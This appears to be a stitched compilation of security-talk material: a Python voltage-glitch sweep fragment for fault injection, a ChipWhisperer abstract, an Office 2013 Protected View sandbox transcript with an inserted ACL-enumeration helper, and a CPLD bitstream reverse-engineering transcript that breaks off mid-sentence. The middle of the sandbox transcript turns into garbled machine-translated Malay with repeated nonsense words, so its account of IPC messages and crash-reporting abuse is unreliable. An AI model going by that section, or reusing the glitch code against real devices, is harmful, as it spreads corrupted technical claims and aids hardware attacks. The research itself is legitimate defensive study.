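def sweep(port="/dev/ttyUSB0"):
    hits = []
    with serial.Serial(port, 115200, timeout=0.5) as ser:
        for width, offset in itertools.product(range(10, 200, 10), range(0, 1000, 50)):
            set_glitch(width, offset)
            arm_glitch()
            result = ser.readline()
            if result and result != EXPECTED:
                hits.append((width, offset, result))   # wrong sum means the glitch landed
    return hits
```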
|
The super-cool area of side-channel power analysis and glitching attacks are devious methods of breaking embedded devices. Recent presentations (such as at RECON 2014) have shown that these attacks are possible even with lower-cost hardware, but it still requires a fair amount of hardware setup and experimentation. But we can do better. This presentation sums up the most recent advances in the open-source ChipWhisperer project, which aims to bring side channel power analysis and fault injections into a wider realm than ever before. It provides an open-source base for experimentation in this field. The ChipWhisperer project won 2nd place in the Hackaday Prize in 2014, and in 2015 an even lower-cost version of the hardware was released, costing approximately $200. Attacks on real physical devices is demonstrated including AES peripherals in microcontrollers, Raspberry Pi devices, and more. All of the attacks can be replicated with standard lab equipment – the demos here will use the open-source ChipWhisperer hardware, but it’s not required for your experimentation.
|
10.5446/32815 (DOI)
|
Good morning everyone, and thank you for joining me today for this talk on the Microsoft Office 2013 Protected View sandbox. I am Yong Chuan, and I am a security consultant with MWR InfoSecurity in Singapore. In an application sandbox, access to resources is what it all comes down to. But what are we talking about here? These could be things like the file system or the registry, or operations such as making network connections or creating new processes. As a consequence of sandboxing, there are sometimes operations that a sandboxed process legitimately needs to perform but is not allowed to do on its own. So typically there is a broker process that can carry out these operations on the sandbox's behalf when it requests them. Protected View is a sandbox that was introduced in MS Office 2010. Unlike the normal case, Protected View is not used to open every document; it is meant for documents that Microsoft considers untrusted. That covers documents downloaded from the internet, email attachments and so on, anything that is flagged as untrusted content. So in general, Protected View will render the document in a read-only mode, and at the same time it opens it inside a restricted environment. Now, the motivation for this work is that these days researchers are increasingly looking at sandboxes as targets. For example, Mark Vincent Yason and James Forshaw have published research on the IE EPM sandbox. But even now, when Protected View has been around for about five years, there is still no public research on it, and Microsoft has not released technical information about this sandbox. Coming back to the goals: the aim of this research is to document the internals of the Protected View sandbox and also the attack surface that it exposes to a compromised sandboxed process, i.e. the IPC. A whitepaper has been released together with this presentation, so please refer to it for more details if you want them. And for anyone who has been waiting for 0-days today, I would like to apologize in advance. So, moving on to the agenda: I will talk about the sandbox internals, which will cover the architecture, the process startup, and the restrictions on securable objects and system resources. And since there is no public information, the Protected View sandbox model will be compared against the IE EPM sandbox.
The IE EPM model is used for comparison because there is code reuse within Microsoft, or the sandboxes were built by related teams, and also because there are good references for it written by many other researchers. Now, this is the usual IE EPM picture for a sandboxed process: the broker process, the sandboxed processes that render web content, and the OS underneath. In this model, three main components are essential to how the sandbox functions. The first is the interception component, the second is the elevation policy component, and the last is the IPC. The interception component is used to hook API calls, so that a call made inside the sandbox is forwarded to and executed in the broker's context; there are certain operations that can only be performed in the broker's context, and the elevation policy then decides which of those requests the broker will actually carry out on behalf of the sandbox. In IE, the interception is done by patching the EAT entries and the prologues of the hooked functions. As it turns out, there is no such hooking in Protected View, so there is no interception component here. And since the interception component is absent, the elevation policy is not there either, since the two work together. But that still leaves other things, so let us look at this from another angle. We know roughly when Protected View was introduced, so the first thing we did was compare Office 2007 and Office 2013 and check whether the same kinds of components are present. Office 2007 is used because it is the last version that does not implement Protected View, which means anything new is likely to be related to the sandbox. From that comparison, nothing resembling the interception machinery shows up, and so we concluded that those components really are absent. Next, the IPC is an important component in any sandbox, because for various reasons the sandboxed process needs to talk to the broker at runtime. Not surprisingly, this exists in Protected View as well, although it differs from the IPC used by IE EPM; it will be described in the later part of this talk. So the Protected View sandbox is actually very simple, and it looks something like this, without those other components. This is interesting, because the sandboxed process only has to render the document, and so all the other machinery is not needed. It also means the attack surface is smaller, especially compared with what is typically exposed by the IE EPM sandbox. As a final point, note that all the untrusted content is parsed and rendered inside the sandboxed process; we can see how that is arranged from the objects we will discuss later.
Now, for a sandbox there are three requirements that should be satisfied. First, the sandboxed process has to be started in a restricted state; then there must be a channel that the sandboxed process can use to communicate with the broker process; and finally the process should also be constrained with a job object. We will now walk through the process startup and, at the same time, check these three requirements. So, this is the startup sequence, and there are two modes to keep in mind here. The broker first consults the registry under HKLM\Software\Microsoft\Office\Common\Security to decide how the sandbox should be launched, for example whether to run it inside an AppContainer. It then sets up the job object limits, although not all of them are applied, and notably there are no UI restrictions. After that, it produces the token for the sandboxed process: in AppContainer mode this is created through the AppContainer APIs, and in low-integrity mode a restricted, low-integrity token is derived from the broker's own token. The sandboxed process is then created with that token. I am sure many of you know that securable objects are the system resources that access control can be applied to; here we are interested in the ones in the file system and the registry. To work out what the sandbox can reach, we search for the sandbox SID and the AppContainer SID in the ACEs of securable objects across the file system and the registry. For the file system, the sandbox SID only appears with a small set of generic and standard rights, and it is not granted write access to files outside its own container locations, which is what we would expect from the process startup. For the registry, the sandbox SID can reach its own sandbox-specific keys with read and standard rights, and for other keys the access is similarly limited. Among the readable locations are the Software\Microsoft\Office keys, which expose more information to the sandbox than it strictly needs.
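As an illustration of the kind of ACL sweep described here, the helper below walks the DACL of a file-system object and reports any ACE that mentions a SID of interest, for example the sandbox or AppContainer SID taken from the process token. It assumes the pywin32 package and is my own helper, not something shipped with Office.

```python
# Look for a given SID in the DACL of file-system objects, roughly the
# enumeration described above. Requires the pywin32 package; run on Windows.
import win32security

def aces_for_sid(path, sid_string):
    target = win32security.ConvertStringSidToSid(sid_string)
    sd = win32security.GetNamedSecurityInfo(
        path, win32security.SE_FILE_OBJECT,
        win32security.DACL_SECURITY_INFORMATION)
    dacl = sd.GetSecurityDescriptorDacl()
    found = []
    if dacl is None:
        return found
    for i in range(dacl.GetAceCount()):
        (ace_type, ace_flags), mask, sid = dacl.GetAce(i)
        if sid == target:
            found.append((ace_type, hex(mask)))   # ACE type plus the access mask bits
    return found

# Example: substitute the sandbox/AppContainer SID string you pulled from the
# token, and point it at the paths (or, with SE_REGISTRY_KEY, the keys) of interest.
print(aces_for_sid(r"C:\Users\Public", "S-1-5-32-545"))
```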
What this means is that information which should arguably be off-limits is still readable by the sandbox. One interesting thing you can pull out of the registry, for example, is the File MRU list, which records the documents that have recently been opened in Office. To sum up the access situation: on its own, the sandboxed process can really only read from the file system and the registry, and write only to its own container locations. With no UI restrictions in the job object, it can also interact with the windows of other processes on the same desktop, which is one indirect way to get at resources it cannot touch directly. And finally, the sandboxed process can still make outbound connections to the internet. Next, I will talk about the IPC mechanism that Protected View uses, which is what the sandbox relies on whenever it needs the broker to do something for it. I will first describe the objects and the format that are used, and then walk through some of the messages. This is an overview of the objects used for the Protected View IPC; it starts with a manager object that ties the IPC pieces together. The IPC object itself keeps the state of the IPC channel, the named pipe, and the buffers used for reads and writes, and it also carries information about the sandboxed process as one of its fields. Related to this, the broker has a way of keeping track of every file involved, and that starts from a file-map object. The file map records the untrusted files that have been opened, together with information about each of them; some of the fields are left out here because they are unused or not well understood. This is the layout of an individual file entry, and here you can see more clearly that the file object stores information about a single file. In particular, the file ID is important because it identifies the file, starting from a value of one for the first file, and it is used in many IPC requests that ask the broker to act on the corresponding file object. This map is not always present, though; it depends on the process that opened the file. If the document comes in through the other paths (1B, 2A and 2B on the earlier diagram), then this object is not created, and the WWLIB group of IPC messages is not available either. As a side note, the global variable at 015E9A96 reflects this state as well.
Seluruh-suruh objek ini menginginkan bahawa ada rehat yang diperkenalkan oleh mesej IPC. Mesej ini mungkin sangat mudah untuk meminta nama file untuk ID yang berkhorus. Mesej IPC ini dapat diperkenalkan dengan dua kumpulan. Bersyukurkan apakah ia dihantar di MSO.dll atau WWL.dll. Perhatian lain dari ini adalah dengan situasi yang mengeluarkan, WWLi adalah subgroup yang akan mengeluarkan. Mesej IPC mesej itu tidak akan diperkenalkan. Seluruh-suruh mesej IPC akan mengeluarkan perhatian dan perhatian yang tersebut. Perhatian untuk mesej dan WWLi akan berkhorus. Perhatian lain akan berkhorus adalah mesej yang mengeluarkan mesej yang mengeluarkan. Mesej ID yang mengeluarkan perhatian dan jawapan bersama dan mesej yang mengeluarkan yang sepatutnya mempunyai kumpulan mesej 2000 yang kita telah melihat dari kawasan pembunuhan. Perhatian ID yang mengeluarkan adalah unik oleh mesej WWLi. Perhatian lain untuk jawapan yang berkhorus adalah yang sama, tetapi untuk perhatian pertama, kita patut menunjukkan perhatian yang mengeluarkan. Mesej ini berkumpulan di MSO dan WWLi. Mesej ini berkumpulan di MSO dan WWLi. Sebelum perhatian perhatian, perhatian pembunuhan adalah melakukan pada pembunuhan. Perhatian pembunuhan adalah mengeluarkan sehingga pembunuhan yang betul dengan pembunuhan yang berkumpulan. Atau dalam beberapa kes, perhatian IPC mempunyai pembunuhan yang mengeluarkan. Atau, perhatian pembunuhan yang berkumpulan atau perhatian pembunuhan yang berkumpulan. Sekarang kita akan melihat pembunuhan IPC yang memulai Pembunuhan 001. Pembunuhan ini tidak mempunyai pembunuhan mesej dan yang ia membuat untuk menghidupkan dan mengubah pembunuhan pembunuhan yang berkumpulan dengan kawasan kawasan kawasan, tanpa membeli pembunuhan. Dan ia digunakan sebagai pembunuhan kerja untuk pembunuhan pembunuhan yang berkumpulan. Kekal pembunuhan software ini biasanya menggunakan pembunuhan pembunuhan dengan pembunuhan sebagai kawasan pembunuhan pembunuhan. Sekarang kita akan melihat pembunuhan Pembunuhan 061 yang mempunyai pembunuhan pembunuhan mesej yang berkumpulan dalam pembunuhan pembunuhan. Jadi kita mungkin fikir pembunuhan pembunuhan Pembunuhan 061 untuk menggunakan beberapa pembunuhan untuk mengubah pembunuhan pembunuhan yang berkumpulan dengan pembunuhan pembunuhan pembunuhan dengan pembunuhan pembunuhan yang telah dikejar pada pembunuhan pembunuhan. Tapi ini akan membuat saya rasa sebab untuk mengubah pembunuhan pembunuhan pembunuhan pembunuhan yang tidak terjadi selepas pembunuhan. Jadi ini membawa kita ke sengaja scenario kedua. Sejak ia perlu dikenali, kita mungkin mahu cuba mempercayai pembunuhan pembunuhan dengan pembunuhan pembunuhan. Tapi ini juga tidak dipercayai kerana pembunuhan mesej tidak dipercayai dalam pembunuhan pembunuhan Pembunuhan DW untuk keputusan ini. Sekarang bahawa pembunuhan pembunuhan pembunuhan URL masih dipercayai daripada pembunuhan pembunuhan dan pembunuhan 091 adalah keputusan untuk keputusan ini. Ia akan mempercayai pembunuhan Pembunuhan pembunuhan Pembunuhan pembunuhan Pembunuhan. Ini akan dipercayai per per sesi dan akan dipercayai per perjalanan pembunuhan Pembunuhan. 081 berkata untuk membuat pembunuhan pembunuhan untuk pembunuhan untuk yang mempercayai untuk kembali ke pembunuhan. Ini adalah contoh pembunuhan yang hanya apabila pembunuhan pembunuhan mempercayai seperti pada saat pembunuhan pembunuhan. Pertanyaan ini adalah kerana pembunuhan tidak membuat pembunuhan pembunuhan. 
Apabila pembunuhan pembunuhan dibuka, pembunuhan pembunuhan akan berhasil dengan cepat dan pembunuhan untuk menjaga pembunuhan. Selepas mencombang pembunuhan, pembunuhan akan menerima pasal itu dan ia akan menjaga pembunuhan untuk mengambil pembunuhan Sehingga ini adalah keadaan yang mempunyai pembunuhan pembunuhan dan pembunuhan akan mengambil pembunuhan untuk sandbox yang dah mulut. Jadi, dalam kes yang menarik, kerana ia tidak mempercaya situasi, ia akan selalu membuat perjalanan kerja baru untuk password bahkan selepas file ini terbuka. Seperti yang anda lihat dari snap last semasa file ini sudah terbuka di latihan. Jadi, saya tidak pasti apakah keadaan ini mempunyai atau tidak. Selanjutnya, kita akan melihat mesej 0C1 yang telah mengalami keberadaan yang tidak terbuka. Di dalam perjalanan keberadaan yang terbuka, semasa perjalanan berubah, pergantungan yang terdekat akan membuat D-WIN untuk diri dan mengambil informasi tersebut, seperti eIP yang terdekat. Tapi dalam keadaan yang menarik, desainbox tidak dapat melakukan sebab kerja berlaku. Jadi, ia akan menggunakan keberadaan 0C1 supaya broker boleh membuat D-WIN pada hal ini. Dan sebab mesej IPC yang telah mempercaya sehingga 2000 bytes, broker akan mempercaya informasi tersebut dengan membuat memori yang telah dihubungi. Seperti desainbox membuat memori yang telah dihubungi dalam kabel format. Sebenarnya, broker akan mengambil informasi tersebut untuk D-WIN dalam kepadamu memori yang telah dihubungi dengan broker memori yang telah dihubungi. Ini adalah format memori yang broker akan membagi dengan D-WIN. Dua bahagian ini adalah menerimanya di sini. Di dalam keadaan pertama, WER Summit Foul List adalah listan foul foul yang telah dihubungi kepada server WER. Satu foul yang telah dihubungi oleh WER adalah untuk dipercaya oleh desainbox sebagai sebahagian IPC. Pembuatan kedua adalah perang yang telah dihubungi untuk D-WIN untuk report WER. Dan dihubungi oleh desainbox dalam memori yang telah dihubungi. Sebelum kita pergi, kita akan membuat sebuah perang yang menghadiri melalui perang yang telah dihubungi dengan sebahagian IPC. Apabila perang yang telah dihubungi, pembantu akan mempunyai 3 opsi. Periksa online untuk menolong program atau membangun program. Jika dia memilih pilihan pertama, D-WIN akan menghubungi perang yang telah dihubungi oleh WER. Dari perang yang telah dihubungi adalah perang yang telah dihubungi dengan perang yang telah dihubungi seperti perang yang telah dihubungi, yang berkaitan dengan perang ini dalam format XML. Di perang yang telah dihubungi ia akan membuat jika perang ini cukup menarik atau unik dalam perang data dan jika ia sangat menarik, ia akan meminta aplikasi untuk perang yang telah dihubungi dengan perang yang telah dihubungi yang telah dihubungi dan perang ini akan dihubungi dalam paket dot-hat. Setelah menghubungi, D-WIN akan menghubungi Mountain Network Sementara masih. Jadi tanap caranya sangat wer Sudah levah itu. ним ideals stemsi weiter Pertama, ia menyebabkan bahawa Sambox memperkenalkan broker untuk menghubungkan container Sambox. Seperti yang dikatakan dengan Founame Fuew, Sambox akan membuat satu file di paket doktat untuk data level 2. Tetapi, Fuew akan membuat hanya founame fuew kerana broker akan pertama mencari keadaan yang tidak terlepas sebelum mempengaruhkan pembentangan Sambox untuk pembentangan Sampoq ini memastikan foun ini diada di container Sambox. Sambox menunjukkan pembentangan Sambox yang hanya memperkenalkan pembentangan. 
Tapi jika anda mencari MSDN, ia akan berkata bahwa dalam file IOAPI, secara internal, ia akan membuat founame fuew kembali kembali kembali kembali kembali kembali. Jika anda memakai founame fuew, ia akan membuat founame fuew mengambil pembentangan dan memasukkan founame fuew. Sehingga, saya boleh menunjukkan founame fuew. Baiklah. Sebegitu, kita membuat apa yang kita buat untuk memperkenalkan DLL dalam proses Sambox dengan pembentangan. Ya, ia adalah pembentangan. Jadi, ini adalah parameter? Ya, tidak. Jadi, ini adalah parameter untuk mesej 0C1 dan ini adalah pembentangan untuk membuat founame fuew. DLL akan juga membuat membuat pembentangan Sambox dan membuat membuat founame fuew. Jadi, jika anda mahu melihat pembentangan yang diperkenalkan tadi, anda boleh membuat membuat pembentangan yang diperkenalkan dan membuat pembentangan. Jadi, sebetulnya, apa yang kita meminta adalah langkah ini, ini membuat kita membuat pembentangan Sambox ke dalam kainan ke atas kainan dan cuba memulai pembentangan ini. Saya akan membuat pembentangan dan dengan mengandung pembentangan, anda boleh memasukkan pembentangan ke dalam kainan Microsoft atau anda boleh membuat pembentangan sebab pembentangan anda, dan sebab anda tidak memasukkan apa-apa yang anda akan melakukan pada pembentangan pembentangan anda hanya membuat pembentangan di sini dan ini sebenarnya pembentangan kami di sini. Jadi, saya akan membuat pembentangan pembentangan. 130. Okey. Jadi, kita membuat pembentangan 3, 4, 4, 4. Okey, periksa online untuk menghentikan data level 1. Jadi, data level 1 mengandungkan XML yang sepatutnya seperti ini. Dan ini akan beritahu serva-server OS dan aplikasi versi dan juga informasi keberanian dan ini akan adalah file yang akan dibentang kembali ke level 2. Jadi serva akan memasukkan kembali kembali ke level 2. Data level 2. Dan sebelum pembentangan, serva akan perlu membuat permintaan untuk membuatnya. Jika anda melihat pembentangan yang tersebut yang dikeluarkan, anda akan melihat bahawa ini sebenarnya yang kita mengalami. Dibentang oleh pembentangan di sini. Kita akan memasukkan dan ini akan dibentang. Dan ini patutnya memasukkan di sini. Ya. Jadi ini akan di deskripsi. Jadi, kita boleh mengeluarkan file untuk serva yang dikorek untuk wasan.microsoft.com atau untuk penggambaran serva yang dikorek. Jika tidak, kita boleh menggunakan dwindl untuk memasukkan file yang dikorek sehingga ia akan tersebut selepas memasukkan pembentangan. Jadi ini akan dikorek dan kemampuan untuk membuat serva yang dikorek. Jadi kita akan melihat jika ini masih ada di pembentangan 2016. Pada mesej yang terakhir, pembentangan 0F1 adalah mesej yang membuat clv.exe yang akan memasukkan pembentangan pembentangan terdapat pada pembentangan. Dan pada mesej yang 0C1 ada juga AV di sini. Dan kali ini kita akan memasukkan pembentangan. Jadi pada sisi terakhir kita akan melihat jika ada pembentangan yang dibuat untuk model sandbox 2016. Dalam pembentangan, ada dua pembentangan yang penting. Pada pembentangan yang terakhir, pembentangan pembentangan terdapat pada model individual seperti MSO20 Win32 Client.dll. Dan kemudian pembentangan secara secara secara secara secara baru dengan Windows 8 juga dikorek. Dalam pembentangan sandbox, tidak ada kemampuan yang dikorek jadi apa yang bermakna adalah tidak akan ada pembentangan untuk pembentangan yang sandbox boleh menggunakan. Pada pembentangan yang terakhir, pembentangan yang terdapat selain untuk pembentangan pembentangan yang korek boleh menggunakan sebelum memulai pembentangan sandbox. 
Jadi pembentangan ini sedang terlihat agak keras kerana sekarang tidak ada cara yang boleh kita pembentangan pembentangan pada EBS kemudian membuat pembentangan untuk pembentangan pembentangan. Mungkin ini berkongsi untuk pembentangan yang akan diperlukan pada perjalanan. Jadi disini kita lihat pembentangan 0C1 lagi. Dan saya menarik saya kerana sejak masa yang mereka berjawab pada masa pembentangan 2016, itu sebenarnya 2.5 bulan untuk menambah beberapa alasan untuk mencari untuk ke depan. Jadi jika anda mencari pembentangan yang di-lihat dengan yang di-lihat, anda dapat lihat bahawa tidak ada perubahan untuk pembentangan yang belum dikorek. Jadi, tentu saja, ini adalah salah satu alasan yang terhadap keadaan untuk dilakukan. Tapi saya faham bahawa kerana untuk mencari ini akan pertama membutuhkan keadaan yang di-lihat dalam pembentangan. Kemudian alasan penggunaan yang digunakan juga perlu disentuhkan kembali kembali ke WEL dan juga untuk membunuhkan. Jadi masalah 161 ini adalah alasan yang baru dibunuh pada tahun 2016. Dan ia akan di-lihat hanya dengan alasan yang di-lihat. Alasan yang dibunuh oleh alasan. Jadi, alasan yang mudah untuk memprotek atau memprotek alasan ini untuk keadaan yang di-lihat. Dan akhirnya, alasan ini adalah alasan yang baru dibunuh, tetapi tidak ada apa-apa yang lain. Jadi, pada akhirnya, alasan yang baru dibunuh tidak memperbaiki alasan yang sepatutnya yang digunakan. Oleh itu, ia dapat membuatkan perjalanan dan kekontrolan alasan untuk memperbaiki model yang sangat mudah. Alasan ini juga bermaksud bahawa alasan yang mempunyai alasan yang di-lihat dan sebagai perjalanan, alasan Odobe mempunyai alasan yang lebih 200 lagi daripada alasan yang di-lihat dalam perjalanan yang di-lihat. Meskipun, alasan yang masih di-lihat, untuk contoh, alasan desktop dan alasan UI yang di-lihat tidak di-lihat oleh perjalanan. Alasan ini telah di-lihat sejak IEPM. Alasan yang menarik untuk alasan kualiti Microsoft telah di-lihat dengan alasan yang berbunuh dan sebagainya. Tetapi, alasan yang di-lihat masih di-lihat, walaupun bahawa alasan itu mempunyai alasan yang lebih berjalanan, dan juga alasan yang di-lihat yang tidak di-lihat. Untuk menggunakan alasan 2016 sebagai alasan untuk menggunakan bagaimana alasan yang boleh berubah, sedikit bahawa tidak akan ada banyak perubahan, tetapi saya berterus berterus memikirkan bagaimana alasan yang baru yang dilakukan dalam perjalanan. Semua ini masih membuat alasan yang baik untuk pelanggan. Di sini adalah alasan yang di-lihat dan ini adalah akhirnya. Terima kasih.
|
The first part of this talk will sketch the Protected-View sandbox internals by discussing about its architecture, its initialization sequence and the system resource restrictions. The second part will discuss the Inter-Process Communication (IPC) mechanism, including the mode of communication, undocumented objects involved, format of IPC messages and the semantics of selected IPC messages.
|
10.5446/32817 (DOI)
|
You guys hear me now? Okay, sounds good. So my talk is called from Silicon to compiler and it's pretty much that. So we're going to start off with what we're doing, why we're doing this, a little bit of architectural background on programmable logic for those of you who have not done work on programmable logic before. Then jump to a block diagram of the device. We'll start with the high level overview of the silicon and then we'll drill down into more interesting stuff down to transistor level and gate level circuit analysis. At the end I do have a live demo of firmware produced by my tools running on live silicon. Sadly there are no cute pictures in this presentation, sorry. So a little background about me, I pretty much like to build and break everything. I will do web stuff if they pay me enough. I mostly like to live down in low level, a bit of ring zero, firmware, low level board design, RTL design and now getting down into transistor level. I just finished up my PhD a few weeks ago. During that time I designed and created what I believe is the first ever college class on semiconductor reverse engineering. I tried quite hard to find another one that I could borrow notes and slides from as far as I can tell none existed. And I'm also obviously a significant contributor to Silicon Prone. So if you see all the guys walking around with decap chips in their shirts, say hi. I've only been with IO active since January. A lot of this work was actually done before I joined the company but they've supported me continuing the work. So I acknowledge them for that obviously. So as far as what we're actually trying to do and why, program logic is really everywhere these days. You may not know it but a lot of especially high end networking AV, all sorts of stuff has program logic in it because A6 these days the tape out costs are so high especially for leading edge process nodes it usually is not actually cost effective to make custom silicon unless you're making a huge number of them like for a smart phone or something. For anything else you're probably better off running on an FPGA. And the problem is they're full of black boxes. Nobody really knows what happens when you compile your bit stream onto a device. You know okay well we've got these lookup tables, we've got these RAM blocks but what is actually going on underneath? How do I know that the RTLI gave the compiler is actually equivalent to what the actual device's behavior is? We don't know. Or how do I do development on a platform that is not x86 or x64 windows or one of the very short list of Linux distros they support? Sorry, out of luck. And let's say we think we found a compiler bug. Oh we just pop the code and obj dump and look at it. Nope there is no decompiler for the bit streams so if you think it's generating bad code, sorry you're screwed. And of course reverse engineering this is recon. The vendors want people to think bit stream reversing is hard. They advertise their closed source proprietary format as being impossible to reverse engineer. It's not. So as far as the methodology here, I just decided earlier today to take a look at the size of the directory I had installed the Xilinx tools in. 18 gigabytes. I don't know about you but I don't have time to look through 18 gigabytes of stuff in IDA. There are much better things I could spend my time on. And plus the license agreement says I'm not supposed to be a reverse engineering software. I never agreed not to look at the silicon. So open source spending means necessary. 
So this is our target. It is the Xilinx XC2C32A. I chose it for a bunch of reasons. One is that it is very cheap. They're about $1.15 each on Digi-key in single units as of a couple of weeks ago. I think the price just went up to $1.20 something. But they're still cheap enough you can afford to kill large numbers of them testing. You have your choice of a nice big QFP package that's easy to hand solder, has plenty of plastic around the package so it's easy to decap while keeping bond wires intact. Or you can do chip scale BGA or QFN if you just want to dunk the thing in acid and get rid of all the plastic and take a look at the silicon. It's a nice friendly 1.8 nanometer process for metal UMC. So you can actually read out most of the upper metal layers optically. You don't have to bother going into the electron microscope except for the lowest layers. So that helps. It's a lot easier to use an optical microscope in a SAM. It's a lot quicker to shoot a lot of images quickly. The bitstream is also not that big. It's around 12K. So there's not really that much better reverse. And it's also a fairly simple architecture. You're not going to find block ram and embedded arm cores and all kinds of stuff like that. It's just pure programmable logic. And the two vendor tools are free which always helps. Hackers are cheap. So the bitstream format for this thing at a high level, the output of the compiler is a JDEK programming file. It's basically the equivalent of IHACS but instead of being HACS lines, it's binary lines, ASCII 1s and 0s. So this is the exact data that gets written to the chip. Not in the actual order. I'll get to that later. But it is, there is a one-to-one correspondence between these 1s and 0s and configuration bits on the device. And the nice thing is that, as you can see on the right side here, the bitstream generated by this I-Link's tools, if you're so inclined, does have comments. Turns out they're not very useful. They just say, okay, block zero ZIA. Well, what is a ZIA? Look in the datasheet. There is not one reference to ZIA. Okay. It doesn't really help me much. So let's get a little bit into the architecture of what a CPLD actually is. So any digital equations can be expressed using a form known as sum of products. It's a canonical representation of digital equations in which you take a series of terms, you bitwise and them together, either of the input or its complement. You can just treat the complement as coming into your device. So you've got A and B and C or C and D and E, et cetera. So you can express any arbitrary digital equation this way. So let's look at how we'll actually make a chip to do this. So if we have a large, say, 32 input AND gate and we have a MUX at the input to the gate, that lets me select between a constant one or the input to my circuit, I can effectively MUX any subset of these inputs and just leave the others as one, which is the identity for the bitwise AND operation. So I can AND together any subset of the possible inputs to this AND gate. The same thing can be done for OR. Obviously, you have to use zero as the identity element for bitwise OR. But what this means is you can create a gate that has a huge number of inputs and I can pick any subset from those at runtime with MUX settings. So this leads to a natural structure for a programmable logic device. You make a grid of gates with a 2-1 MUX at each input. You've got inputs coming in, outputs going down, and then you just have a series of gates in sequence and stuff together. 
So this is actually a render for my tool. You can see we've got the input coming in. We select either X or X prime and that with the data coming in from overhead. Take the output of that. Now here we skip the AND gate. This is more of a logical view, so I'm not actually showing the actual MUXes in the chip. This is more of a schematic view of what the circuit logically does. I'm also rendering it as a cascaded sequence of gates end to end. In practice, the actual implementation on silicon is usually a tree because nobody wants order AND propagation delay when you could have order log AND instead. So if we take this and we want to build a full programmable logic device, what we do is we take a bunch of signals coming from our registers that store state. We take a bunch of signals from our input pins. Then we feed these into an AND array. We invert them so we have two times however many inputs. We take M product terms out of that. The product terms then go into a programmable array. The output of that gives us, we'll just call it our outputs. Then we feed those either into an output pin or into a flip-flop of one of the state machines or something like that. So this is really all it takes to build a simple programmable logic device or SPLD. The problem is SPLDs scale poorly. You end up having quadratic scaling with the number of inputs. Nobody wants to die whose size scales quadratically with the amount of work it can do. That's terrible. So how can we improve this? Well, it turns out we can make a grid of small SPLDs. So it doesn't show up as well as I had hoped on the projector, but we've got one SPLD block here. We've got one here and there's a crossbar switch in the middle. So now we can create a bunch of outputs from one SPLD, a bunch of outputs from the other, and then just feed them all into one big routing fabric, pick out whichever signals I'm interested in processing on this half of the chip or that half of the chip, and then feed them into the SPLD. So this is a SPLD. So now let's look at the specific SPLD that we've been targeting today. So there are 32 GPIO pins which are full input output plus one input only pin. I'm pretty sure this is because they intended to package the die in a 44 pin QFP package. All of the other stuff for JTAG power and the 32 GPIOs use 43 pins. They didn't want to have one NC pin. So they just threw one extra signal into the global routing that you can't drive and it just serves as an extra input. And then the remainder of the device is two function blocks which are basically SPLDs. Each one has 16 GPIO pins, 16 flip flops. Of the 65 signals in the global routing, so 32 IOs, 32 flip flops plus one input only 65. We pick 40 of those, feed those into an 80 by 56 and array, then a 56 by 16 array. This is all documented in the data sheet. What's not documented is, okay, we can make a technology math net list. We know, okay, I have these inputs added together, these outputs or together. Now, how do I actually make the chip do what I want? So time to put in our lab codes. I am not going to talk about decapping and imaging. This has been beaten to death in other talks like recon last year and I think the year before that and probably the year before that. So we're not going to cover that. There's a lot of good stuff up on SiliconPron. There's, if you read the lecture notes from the class I taught at RPI last year, there's a lot of good material there. But this talk is about reverse engineering, not on sample preparation. 
We're not going to be teaching you how IDA works. We're teaching you how to actually reverse engineer this specific device. So here is the metal 4 overview of the device. We can see that there is a roughly left-right symmetry. It's not exact. You can see here there's something that's not mirrored here, but up here it looks like the device is pretty symmetrical. So first impression, we've probably got the two function blocks left-right symmetric on the device. Let's go down a little bit. After we've etched off all of the metal and poly layers, we're now looking at the implant layer. This is after a process known as dash-etch, which stains P-type doping either brown or it shows up raised under the electron microscope. Mainly, though, it's useful because it provides contrast in areas of gates. So you can see we've got pair-wise symmetry here and here. Those are probably the function blocks. There's something down the middle. That's probably the global routing. Then there's a large memory right here. Pretty obviously the EEPROM where the bitstream is stored. Then if we actually follow the bond wires from the die out the pins in the package, you can see these are the JTAG pins, CDI, TMS, TCKI, I believe top to bottom. The TDI pin is right there. So we can conclude that the JTAG shift register probably runs left to right across this configuration area and somehow allows you to write this EEPROM here. There's also a few small pairs. There's one up there. There's one up there. I think there's one on the upper left. There's a total of six. I have not yet figured out what these do. It wasn't necessary to reverse the portions of the device I needed. So that remains future work. So let's take a closer look at the function block. So we know there are 16 macros cells. Each macros cell contains one flip-flop and stores the output of one term of the ORA and has a little bit more glue logic I'm going to talk about later on. So there is 16 wide symmetry here. 16 identical copies of this. Just by looking at this, we can be pretty sure we're looking at the macros cells. Then we see some structures up here and here. This looks symmetric. This looks symmetric. This looks symmetric but different. So as it turns out, the AND array is not actually one solid block. The AND array is split in half. They've got 20 signals here, 20 signals here. Collectively that forms 40. Then they AND the outputs of those two individual blocks together. That gives you our product terms. And then that goes into the ORA here and then out the macros cells. So now let's take a quick look at the configuration bit structure before we dive into detailed die analysis. So the programming documentation does talk a little bit about how the device is put together. It turns out that even though the JED format is supposed to be something you can actually just feed to an EPROM program and load the device, that's not the case here. The bit ordering in the JED file is actually virtual addressing in which they abstract away all of the quarks of the silicon. So for example, all of the AND array bits and all of the ORA array bits are in the same order in the JED file for each one. Turns out half the actual AND and ORA array blocks on the device are mirrored left right. So you actually have to do address translation before you can take a bit stream generated by their tools and flash to the chip. Luckily they do sort of document this. 
There's a big Excel file they publish to people who are making program error adapters that is just a big grid of output and input and just has a intrate each cell. It says, okay, which config bit from the JED file goes this physical address? So it doesn't really tell you much about how the chip is put together. The actual structure is 48 rows by 260 columns. There's one extra row full of configuration metadata. I'll get to that later. But it stores seven lock bits, which some of them are always one. I'm not entirely sure what purpose they serve. The remainder are one for an unlocked device and zero for a locked device. Then there's two done bits, which indicate, okay, this bit stream is valid. We have a legal firmware and the chip has been fully flashed. And it turns out also only 258 of the 260 columns are usable. The remainder are what we call transfer bits, which as far as I can tell, you just put them as a constant zero. It just indicates, hey, this row of EPROM has actually been programmed. We didn't abort halfway through programming. There is some documentation of this in a patent from Xilinx, but it didn't really give enough detail for me to figure out, okay, why are they doing this? And the other intuition we can get from this is that since it is EPROM based, then FF is going to be the state of the memory when the chip is blank. So therefore, we expect most of the memory on the device is going to be active low. So most things should be turned off when the bit is high and on when the bit is low. We just don't know exactly what that bit does yet. So now let's take a look at the actual die structure. So you can see that the configuration memory is not actually one block. We've got an array here, one here, one here, one here, and one hiding all the way over here. And as it turns out, the size of these are symmetric about the center, and they go directly up to the corresponding logic. So it's pretty obvious we found the memory that configures that part of the chip. The data just flows straight up during the boot process. So this configures the end of the array, this configures the global routing, this configures these macro cells, this configures these macro cells. We can confirm this if we look up at the 